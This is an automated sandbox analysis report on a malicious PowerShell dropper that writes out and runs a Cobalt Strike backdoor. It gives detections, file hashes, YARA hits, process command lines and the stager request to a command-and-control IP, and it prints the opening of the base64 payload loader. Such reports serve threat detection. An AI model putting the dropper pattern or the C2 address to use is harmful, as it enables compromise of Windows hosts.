fabd6ab15a0540d197f1ceaa312308b8.ps1	21%	ReversingLabs	Win64.Backdoor.CobaltStrike

Dropped Files

Source	Detection	Scanner	Label
C:\Users\user\AppData\Local\Temp\tmpE651.exe	100%	Avira	HEUR/AGEN.1345031
C:\Users\user\AppData\Local\Temp\tmpE651.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\tmpE651.exe	87%	ReversingLabs	Win64.Backdoor.CobaltStrike

Source	Detection	Scanner	Label
http://.17.10.250:80/EkTY	0%	Avira URL Cloud	safe
http://3.17.10.250/EkTY	100%	Avira URL Cloud	malware
http://3.17.10.250/EkTYs	0%	Avira URL Cloud	safe

Name	Malicious	Antivirus Detection	Reputation
http://.17.10.250:80/EkTY	true	Avira URL Cloud: safe	unknown
http://3.17.10.250/EkTY	true	Avira URL Cloud: malware	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://nuget.org/NuGet.exe	powershell.exe, 00000000.00000002.1702047883.0000026422F7A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1717782849.000002643146D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1717782849.00000264315A4000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.apache.org/licenses/LICENSE-2.0	powershell.exe, 00000000.00000002.1702047883.00000264229D1000.00000004.00000800.00020000.00000000.sdmp	false		high
http://pesterbdd.com/images/Pester.png	powershell.exe, 00000000.00000002.1702047883.0000026422E32000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1725475467.0000026439500000.00000004.00000020.00020000.00000000.sdmp	false		high
http://www.apache.org/licenses/LICENSE-2.0.html	powershell.exe, 00000000.00000002.1702047883.0000026422E32000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1725475467.0000026439500000.00000004.00000020.00020000.00000000.sdmp	false		high
https://contoso.com/	powershell.exe, 00000000.00000002.1717782849.00000264315A4000.00000004.00000800.00020000.00000000.sdmp	false		high
https://nuget.org/nuget.exe	powershell.exe, 00000000.00000002.1702047883.0000026422F7A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1717782849.000002643146D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1717782849.00000264315A4000.00000004.00000800.00020000.00000000.sdmp	false		high
https://contoso.com/License	powershell.exe, 00000000.00000002.1717782849.00000264315A4000.00000004.00000800.00020000.00000000.sdmp	false		high
https://contoso.com/Icon	powershell.exe, 00000000.00000002.1717782849.00000264315A4000.00000004.00000800.00020000.00000000.sdmp	false		high
https://oneget.orgX	powershell.exe, 00000000.00000002.1702047883.00000264229D1000.00000004.00000800.00020000.00000000.sdmp	false		high
http://upx.sf.net	Amcache.hve.5.dr	false		high
https://aka.ms/pscore68	powershell.exe, 00000000.00000002.1702047883.00000264213F1000.00000004.00000800.00020000.00000000.sdmp	false		high
http://3.17.10.250/EkTYs	tmpE651.exe, 00000002.00000002.1877232038.00000000000AB000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	powershell.exe, 00000000.00000002.1702047883.00000264213F1000.00000004.00000800.00020000.00000000.sdmp	false		high
https://github.com/Pester/Pester	powershell.exe, 00000000.00000002.1702047883.0000026422E32000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1725475467.0000026439500000.00000004.00000020.00020000.00000000.sdmp	false		high
https://oneget.org	powershell.exe, 00000000.00000002.1702047883.00000264229D1000.00000004.00000800.00020000.00000000.sdmp	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
3.17.10.250	unknown	United States		16509	AMAZON-02US	true

General Information

Joe Sandbox version:	42.0.0 Malachite
Analysis ID:	1602897
Start date and time:	2025-01-30 10:26:07 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 4m 33s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	10
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	fabd6ab15a0540d197f1ceaa312308b8.ps1
Detection:	MAL
Classification:	mal100.troj.evad.winPS1@5/11@0/1
EGA Information:	Successful, ratio: 50%
HCA Information:	Successful, ratio: 88% Number of executed functions: 12 Number of non-executed functions: 15
Cookbook Comments:	Found application associated with file extension: .ps1

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 20.109.210.53, 52.165.164.15, 52.168.117.173, 40.69.42.241, 40.126.31.71, 13.107.246.45
Excluded domains from analysis (whitelisted): onedsblobprdeus16.eastus.cloudapp.azure.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com, fe3.delivery.mp.microsoft.com, ocsp.digicert.com, login.live.com, glb.cws.prod.dcat.dsp.trafficmanager.net, blobcollector.events.data.trafficmanager.net, sls.update.microsoft.com, umwatson.events.data.microsoft.com, glb.sls.prod.dcat.dsp.trafficmanager.net
Execution Graph export aborted for target powershell.exe, PID 4312 because it is empty
Not all processes where analyzed, report is missing behavior information

Simulations

Behavior and APIs

Time	Type	Description
04:27:00	API Interceptor	8x Sleep call for process: powershell.exe modified
04:27:02	API Interceptor	37x Sleep call for process: tmpE651.exe modified
04:27:18	API Interceptor	1x Sleep call for process: WerFault.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
3.17.10.250	1.vbs	Get hash	malicious	CobaltStrike, Metasploit	Browse	3.17.10.250/EkTY

Domains

⊘No context

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
AMAZON-02US	1.vbs	Get hash	malicious	CobaltStrike, Metasploit	Browse	3.17.10.250
	m68k.elf	Get hash	malicious	Mirai	Browse	54.171.230.55
	SOA OF DEC 2024 PT.BINEX.exe	Get hash	malicious	FormBook	Browse	13.248.169.48
	https://l.ead.me/bfibh8/?1778990567JHGFBVDFS56678	Get hash	malicious	HTMLPhisher	Browse	3.161.119.33
	SERVED SUMMON LETTER 01-30-2025.pdf	Get hash	malicious	HTMLPhisher	Browse	13.248.243.5
	contract update.exe	Get hash	malicious	FormBook	Browse	13.248.169.48
	Updated 2025 Trading Agreement for Direct Purchase account.exe	Get hash	malicious	FormBook	Browse	13.248.169.48
	Bank Slip pdf.exe	Get hash	malicious	FormBook	Browse	13.248.169.48
	SWIFT COPY.exe	Get hash	malicious	FormBook	Browse	13.248.169.48
	http://ndex-log.webflow.io/	Get hash	malicious	HTMLPhisher	Browse	18.244.20.134

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_tmpE651.exe_ddb34dd491c5bc1b4e5cb3d770867358ec95a0f8_5d970c58_974b5306-7cba-4072-9f27-fcb724be1b3c\Report.wer

Download File

Process:	C:\Windows\System32\WerFault.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	0.8811825035728077
Encrypted:	false
SSDEEP:	96:wnFHOtkeLGQszhMoh7JfoQXIDcQWc6zcEZcw37/+HbHg/5jgOg0dl/phsv5o1OyG:mNOtkeLGQ80I3D8jZRzuiFkZ24lO8t
MD5:	07EFE9A0B055EF658510955DF9486E72
SHA1:	359C898DDC85BE8FEB87ECA7C357C0A80285E39A
SHA-256:	E288C16CAE9A78BE0FBB7DD9CD403B0BF2AF78F7835696FBFBDCA6D6D5F33E40
SHA-512:	C81C92C285C26BF50E1593DF0B38FEE59251D3E53373CB5BEC2D2CE04045DAEBC0DA5AD59C10E9F5F2C0DAA7BE90820747951DD86F31AD5BFDBEB104B12D159E
Malicious:	false
Reputation:	low
Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.8.2.7.0.2.8.2.6.8.7.3.1.7.1.2.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.8.2.7.0.2.8.2.7.2.6.3.8.0.2.3.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.9.7.4.b.5.3.0.6.-.7.c.b.a.-.4.0.7.2.-.9.f.2.7.-.f.c.b.7.2.4.b.e.1.b.3.c.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.e.9.4.0.9.c.6.b.-.5.e.0.7.-.4.7.a.4.-.9.f.3.f.-.6.c.1.9.b.5.5.1.9.d.3.5.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....N.s.A.p.p.N.a.m.e.=.t.m.p.E.6.5.1...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.f.0.8.-.0.0.0.1.-.0.0.1.4.-.a.5.5.9.-.e.c.1.d.f.9.7.2.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.c.f.6.4.5.9.c.d.4.9.9.d.5.7.e.8.5.4.8.5.9.b.2.0.e.e.d.6.2.2.9.a.0.0.0.0.f.f.f.f.!.0.0.0.0.4.6.a.7.2.2.d.0.e.b.5.1.0.4.d.b.f.7.6.6.1.0.f.d.9.7.0.a.3.a.a.4.b.8.0.7.8.4.0.2.!.t.m.p.E.6.5.1...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.1.9.7.0././.0.1././.0.1.:.0.0.:.0.0.

C:\ProgramData\Microsoft\Windows\WER\Temp\WER16A.tmp.dmp

Download File

Process:	C:\Windows\System32\WerFault.exe
File Type:	Mini DuMP crash report, 14 streams, Thu Jan 30 09:27:07 2025, 0x1205a4 type
Category:	dropped
Size (bytes):	147264
Entropy (8bit):	1.3241916327819871
Encrypted:	false
SSDEEP:	384:/TAJHwc3biBq2aOS5iFdYVU/GQdQxwlQZNFAd0W2A4oKaK:/TWHw2bCq2tEeAU+QdQxwlQZNFAd0WzU
MD5:	F699959380276DEB7E91C307B12360DE
SHA1:	B310FCBC00AD892E7BB310AE09CDCBCD6F276F45
SHA-256:	2C7D45305D0023B82BE4A8D9E52AA30CFFE6E8984FEEF0EC957A271C8BBB7CA5
SHA-512:	D1FDB594AF7B60853D0756CEB48F55757C8CE48131ECE694275060CBC6DC056374903EB630CA5CCFE41779D38E03401AB5DC927C41E43AC2080150D94B2D20B5
Malicious:	false
Yara Hits:	Rule: Windows_Trojan_Metasploit_7bc0f998, Description: Identifies the API address lookup function leverage by metasploit shellcode, Source: C:\ProgramData\Microsoft\Windows\WER\Temp\WER16A.tmp.dmp, Author: unknown Rule: Windows_Trojan_Metasploit_c9773203, Description: Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families., Source: C:\ProgramData\Microsoft\Windows\WER\Temp\WER16A.tmp.dmp, Author: unknown
Reputation:	low
Preview:	MDMP..a..... ........E.g........................x...........d...bZ..........T.......8...........T............+..p.......................................................................................................eJ..............Lw......................T............E.g.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\Temp\WER227.tmp.WERInternalMetadata.xml

Download File

Process:	C:\Windows\System32\WerFault.exe
File Type:	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	8702
Entropy (8bit):	3.698897322204178
Encrypted:	false
SSDEEP:	192:R6l7wVeJw+416YGZS7gmfEwpDt89bVeb10flPejm:R6lXJho6YQS7gmfEXVebGf9e6
MD5:	0A365DA0408F98054D95C81339B010D6
SHA1:	92E97E363E7DDC913B8DF4005D1637B661780CC4
SHA-256:	C817CB92D39050ACDB31521C75F357EB697B7E62331A7C131D0812A3675010B2
SHA-512:	AD758F45A5615FA80BD7BDDA3E6038201457CB7727FFC3C835CA3B0B08E48EC6AFDB952E52DF3457ED0C81F7DE6AA8205D3D1CAE2CFAECF190D11A717969F73A
Malicious:	false
Reputation:	low
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.3.8.4.8.<./.P.i.

C:\ProgramData\Microsoft\Windows\WER\Temp\WER247.tmp.xml

Download File

Process:	C:\Windows\System32\WerFault.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4669
Entropy (8bit):	4.46160046145322
Encrypted:	false
SSDEEP:	48:cvIwWl8zseJg771I9dkFWpW8VYBPYm8M4JpeOKFnyq85EzOGHV3Fad:uIjfUI7907V4SJorNpV3Fad
MD5:	4184B04D2DCC09EC970AFA6E6186F0A5
SHA1:	A21E5F89E1E9134612B7B042FAC4B2A4884A22FF
SHA-256:	40091C68DCC186EF2820A4E7ADED33A6DCBD5D433B0AD2984B9AA8FC0DDF4828
SHA-512:	892ED0D4B0099BD0217A8AB81EAACC3FF951CDB027CA768025F99F6FA9C3B93805D090011FC6C62E06DF539286EC389D1853AB2BE07486972C0AA52E411667DB
Malicious:	false
Reputation:	low
Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="698429" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	64
Entropy (8bit):	1.1940658735648508
Encrypted:	false
SSDEEP:	3:Nlllulbnolz:NllUc
MD5:	F23953D4A58E404FCB67ADD0C45EB27A
SHA1:	2D75B5CACF2916C66E440F19F6B3B21DFD289340
SHA-256:	16F994BFB26D529E4C28ED21C6EE36D4AFEAE01CEEB1601E85E0E7FDFF4EFA8B
SHA-512:	B90BFEC26910A590A367E8356A20F32A65DB41C6C62D79CA0DDCC8D95C14EB48138DEC6B992A6E5C7B35CFF643063012462DA3E747B2AA15721FE2ECCE02C044
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	@...e................................................@..........

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_e14rfb2a.scy.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_q0futhai.pka.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\tmpE651.exe

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	PE32+ executable (GUI) x86-64 (stripped to external PDB), for MS Windows
Category:	dropped
Size (bytes):	19456
Entropy (8bit):	5.223845919613859
Encrypted:	false
SSDEEP:	192:jV7qaCF6Op1t2dobVXujRDcBaXWQjwOT/2L3QzWF8qa1Dojjgi:NqaCF31cix+Dc4zjCFF46gi
MD5:	A7E64FEA00D97B963D90E53093D5E220
SHA1:	46A722D0EB5104DBF76610FD970A3AA4B8078402
SHA-256:	D1EC863E06892A7D5D4F4A495AE43FA8476841A6A83F618D4A5AEE0A9A550C73
SHA-512:	F9C10046699D915CC1A78BF302585B1CAF4191FC3BC6DEBF6FBBD9FDE98AE07B82B04233536A022749463DFC83D57C2F31D31CB4ECD366B9E8295491966046E6
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 87%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d................./...."."...H................@............................................... ..............................................................`..............................................`P..(...................$................................text.... ......."..................`.P`.data........@.......&..............@.`..rdata.......P.......,..............@.`@.pdata.......`.......6..............@.0@.xdata..8....p.......:..............@.0@.bss..................................`..idata...............>..............@.0..CRT....h............H..............@.@..tls.................J..............@.@.........................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\00IMOGVFM67MO8HITX26.temp

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	6221
Entropy (8bit):	3.7316487284588975
Encrypted:	false
SSDEEP:	48:8U0OXJfLPr3C4U282jZbukvhkvklCywKmdgY2TVlCw7SogZoFAY2TVlCw7SogZoX:Xdf33CxH2okvhkvCCtn2TV6Ho2TV6Hq
MD5:	E2E0FF5AAEEACD9404BD8A2C5AA00363
SHA1:	435EC7BAA00EA78CFF02531E3AE05BAE2A1F35AA
SHA-256:	B724ED3808E19DBEF1CC8458FA30216A3AC416C59A15C44DE1667AAF2F1C6E9E
SHA-512:	876F461A1C85EFAB3219E1AC3E0F426A08713FAEF6AE4825D0F18C657F4D7E542BC5FCDF07A528A44571FDD5C3616CB50277A98703CDB45DCC10A3916AE6E639
Malicious:	false
Preview:	...................................FL..................F.".. ...-/.v....~.h..r..z.:{.............................:..DG..Yr?.D..U..k0.&...&......vk.v....$.s..r..;.y..r......t...CFSF..1.....CW.^..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......CW.^>Z\K...........................%..A.p.p.D.a.t.a...B.V.1.....>Z[K..Roaming.@......CW.^>Z[K..........................8Y$.R.o.a.m.i.n.g.....\.1.....DW.N..MICROS~1..D......CW.^>Z`K..........................9D..M.i.c.r.o.s.o.f.t.....V.1.....DWQ`..Windows.@......CW.^DWQ`..........................TR..W.i.n.d.o.w.s.......1.....CW.^..STARTM~1..n......CW.^DW.`....................D.....=X..S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....DW.N..Programs..j......CW.^DW.`....................@.........P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......CW.^DW.`..........................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......CW.^>Z`K....Q...........

C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms (copy)

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	6221
Entropy (8bit):	3.7316487284588975
Encrypted:	false
SSDEEP:	48:8U0OXJfLPr3C4U282jZbukvhkvklCywKmdgY2TVlCw7SogZoFAY2TVlCw7SogZoX:Xdf33CxH2okvhkvCCtn2TV6Ho2TV6Hq
MD5:	E2E0FF5AAEEACD9404BD8A2C5AA00363
SHA1:	435EC7BAA00EA78CFF02531E3AE05BAE2A1F35AA
SHA-256:	B724ED3808E19DBEF1CC8458FA30216A3AC416C59A15C44DE1667AAF2F1C6E9E
SHA-512:	876F461A1C85EFAB3219E1AC3E0F426A08713FAEF6AE4825D0F18C657F4D7E542BC5FCDF07A528A44571FDD5C3616CB50277A98703CDB45DCC10A3916AE6E639
Malicious:	false
Preview:	...................................FL..................F.".. ...-/.v....~.h..r..z.:{.............................:..DG..Yr?.D..U..k0.&...&......vk.v....$.s..r..;.y..r......t...CFSF..1.....CW.^..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......CW.^>Z\K...........................%..A.p.p.D.a.t.a...B.V.1.....>Z[K..Roaming.@......CW.^>Z[K..........................8Y$.R.o.a.m.i.n.g.....\.1.....DW.N..MICROS~1..D......CW.^>Z`K..........................9D..M.i.c.r.o.s.o.f.t.....V.1.....DWQ`..Windows.@......CW.^DWQ`..........................TR..W.i.n.d.o.w.s.......1.....CW.^..STARTM~1..n......CW.^DW.`....................D.....=X..S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....DW.N..Programs..j......CW.^DW.`....................@.........P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......CW.^DW.`..........................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......CW.^>Z`K....Q...........

C:\Windows\appcompat\Programs\Amcache.hve

Download File

Process:	C:\Windows\System32\WerFault.exe
File Type:	MS Windows registry file, NT/2000 or above
Category:	dropped
Size (bytes):	1835008
Entropy (8bit):	4.465570297432728
Encrypted:	false
SSDEEP:	6144:yIXfpi67eLPU9skLmb0b4VWSPKaJG8nAgejZMMhA2gX4WABl0uNXdwBCswSbN:3XD94VWlLZMM6YFHd+N
MD5:	63F36ECD01FF2AE80C34271BCAF93BC7
SHA1:	8B2448ADA8BA9CD1F644D0AD2750E4EAE90CB345
SHA-256:	6771B7403EDE796CB273377FAC2596661556D279698CEB866D45467650E27416
SHA-512:	6886BF65849A96A19B7A5EBE0CB35B4473701BE5BC1676733CCEA692C3F4106F1E641A58127E66F038B621B13840513C91ABF98542710615DD21A1613F2E692A
Malicious:	false
Preview:	regf6...6....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm.L>!.r...............................................................................................................................................................................................................................................................................................................................................).........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

Static File Info

General

File type:	ASCII text, with very long lines (25999), with CRLF line terminators
Entropy (8bit):	4.5718865364812205
TrID:
File name:	fabd6ab15a0540d197f1ceaa312308b8.ps1
File size:	26'998 bytes
MD5:	8e117177bf5213213a857e0772e0d879
SHA1:	34cd43115fd3afc87867b7fafed5d22efd7209fd
SHA256:	c22079f6740eb864daa646b8d6f6a6d038482db3830ec0dd47fa3b0893c9eb0c
SHA512:	004904ab2dc2f6a2d31a7c419cfc532f23bb2d7f8795481a9ebf6116f106b272c9c0b125d9532bab10d0909ce977dd8fe021295193ac0b4f3af0d08433173ac8
SSDEEP:	768:uY4VP0laTHZBJYqP1pnFhoooooohokgpgPR:u4y5gS5bR
TLSH:	E6C21AB75B4B79D82EB50EC951043C828D6CBA9BA721D084BDCC30AAB3B9954CD24DD8
File Content Preview:	..$arquivo_bytes = [System.Convert]::FromBase64String('TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAABQRQAAZIYJAAAAAAAAAAAAAAAAAPAA

File Icon


Icon Hash:	3270d6baae77db44

Network Behavior

Download Network PCAP: filtered – full

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 30, 2025 10:27:02.936757088 CET	49731	80	192.168.2.4	3.17.10.250
Jan 30, 2025 10:27:02.941823006 CET	80	49731	3.17.10.250	192.168.2.4
Jan 30, 2025 10:27:02.943576097 CET	49731	80	192.168.2.4	3.17.10.250
Jan 30, 2025 10:27:02.943770885 CET	49731	80	192.168.2.4	3.17.10.250
Jan 30, 2025 10:27:02.949538946 CET	80	49731	3.17.10.250	192.168.2.4
Jan 30, 2025 10:27:07.010061979 CET	49731	80	192.168.2.4	3.17.10.250

HTTP Request Dependency Graph

3.17.10.250

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49731	3.17.10.250	80	3848	C:\Users\user\AppData\Local\Temp\tmpE651.exe

Timestamp	Bytes transferred	Direction	Data
Jan 30, 2025 10:27:02.943770885 CET	165	OUT	GET /EkTY HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko Host: 3.17.10.250 Connection: Keep-Alive Cache-Control: no-cache

Statistics

Click to jump to process

Memory Usage

• powershell.exe
• conhost.exe
• tmpE651.exe
• WerFault.exe

Click to jump to process

High Level Behavior Distribution

• File
• Registry

Click to dive into process behavior distribution

Behavior

• powershell.exe
• conhost.exe
• tmpE651.exe
• WerFault.exe

Click to jump to process

Target ID:	0
Start time:	04:26:58
Start date:	30/01/2025
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\fabd6ab15a0540d197f1ceaa312308b8.ps1"
Imagebase:	0x7ff788560000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	1
Start time:	04:26:58
Start date:	30/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	04:27:01
Start date:	30/01/2025
